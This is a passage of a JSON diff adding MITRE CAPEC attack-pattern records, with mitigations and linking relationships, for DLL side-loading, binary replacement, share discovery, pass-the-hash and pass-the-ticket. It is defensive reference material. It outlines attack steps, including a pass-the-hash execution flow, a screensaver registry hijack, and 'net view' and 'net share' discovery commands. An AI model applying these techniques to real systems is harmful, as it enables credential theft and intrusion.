"2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fae2dbb-a5ef-4e93-a719-15d38a7d1a44", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.", + "id": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--61327995-a6d3-4961-9d09-10e051ae76d1", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "id": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc1ad6dd-6038-4e55-89dd-eade5373a2f3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.", + "external_references": [ + { + "external_id": "CAPEC-641", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/641.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:DLL Side-Loading", + "external_id": "T1574.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/002" + }, + { + "description": "Stewart A., DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry, FireEye", + "external_id": "REF-501", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + } + ], + "id": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DLL Side-Loading", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must fail to verify the integrity of the DLL before using them." + ], + "x_capec_skills_required": { + "High": "Trick the operating system in loading a malicious DLL instead of a legitimate DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown DLLs from loading through using an allowlist policy.", + "id": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--81f3c1eb-7e57-4f55-a177-cadc6a8aeba8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8fbd576-b3bb-43e0-b295-5483e8f56bdf", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d42819b-82b4-4def-9360-d1f3e4d3ad65", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of sxstrace.exe on Windows as well as manual inspection of the manifests.", + "id": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0606876e-24f7-4cdd-812b-44db26e0f72b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require code signing and avoid using relative paths for resources.", + "id": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32d49392-d7f7-401f-91bc-541841219209", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services.", + "id": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-642-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85cbecfa-a889-485b-8231-630bdae5ed86", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "target_ref": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.", + "external_references": [ + { + "external_id": "CAPEC-643", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/643.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Network Share Discovery", + "external_id": "T1135", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1135" + } + ], + "id": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Identify Shared Files/Directories on System", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\remote system or net share)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools.", + "id": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-643-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--877214d8-d718-4bc4-9edf-9b6d4d5bad4a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "target_ref": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

    2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

    2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.", + "id": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbe2baa0-43b4-4f18-8464-37c77c73232d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee496b22-cfdc-468f-9798-52b53cce0d3b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--885bfaa4-7ef5-4cd8-b4b3-eeaa867bc6d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c5bf1ff-d38b-4163-b8d6-d921aed35652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.", + "id": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": 